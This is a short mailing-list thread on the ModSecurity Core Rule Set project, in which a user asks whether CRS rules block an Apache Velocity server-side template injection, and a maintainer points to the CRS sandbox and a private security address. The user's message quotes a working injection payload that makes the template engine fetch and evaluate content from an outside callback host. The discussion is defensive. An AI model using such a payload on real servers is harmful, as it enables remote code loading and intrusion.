CRS and SSTI with Velocity
32 views
Skip to first unread message
F
Apr 10, 2024, 11:33:23 AMApr 10
to ModSecurity Core Rule Set project
Hi
We found a Server Side Template Injection vulnerability within one of our applications. It seems that Apache Velocity engine is being used.
Sample bad input used as a POST parameter:
#evaluate($import.read('https://918b03op20y3j433zseucbr5mwsngd42.oastify.com/hi'))
Are there any CRS configs that would help to defend against such inputs?
Thank you
Max
Ervin Hegedüs
Apr 10, 2024, 11:44:40 AMApr 10
to F, ModSecurity Core Rule Set project
Hi Max,
On Wed, Apr 10, 2024 at 08:33:23AM -0700, F wrote:
> Hi
>
> We found a Server Side Template Injection vulnerability within one of our
> applications. It seems that Apache Velocity engine is being used.
> Sample bad input used as a POST parameter:
>
thanks for reporting.
First, I really hope this is a public PoC against the mentioned
bug/issue. Anyway, in these cases it would be fine to send this
kind of questions to secu...@coreruleset.org.
> Are there any CRS configs that would help to defend against such inputs?
I'm afraid actually there is no any solution. You can try that
with our Sandbox, eg.:
curl -v -X POST -d "q=$YOUR.MENTIONED.QUERY" -H "x-format-output: txt-matched-rules" "https://sandbox.coreruleset.org/"
For more information (try different versions/backends) see the
Sandbox's documenation:
https://coreruleset.org/2021/12/09/introducing-the-crs-sandbox/
If you want to explain the attack in details, please do it
through secu...@coreruleset.org.
Thanks!
a.
On Wed, Apr 10, 2024 at 08:33:23AM -0700, F wrote:
> Hi
>
> We found a Server Side Template Injection vulnerability within one of our
> applications. It seems that Apache Velocity engine is being used.
> Sample bad input used as a POST parameter:
>
First, I really hope this is a public PoC against the mentioned
bug/issue. Anyway, in these cases it would be fine to send this
kind of questions to secu...@coreruleset.org.
> Are there any CRS configs that would help to defend against such inputs?
with our Sandbox, eg.:
curl -v -X POST -d "q=$YOUR.MENTIONED.QUERY" -H "x-format-output: txt-matched-rules" "https://sandbox.coreruleset.org/"
For more information (try different versions/backends) see the
Sandbox's documenation:
https://coreruleset.org/2021/12/09/introducing-the-crs-sandbox/
If you want to explain the attack in details, please do it
through secu...@coreruleset.org.
Thanks!
a.
Reply all
Reply to author
Forward
0 new messages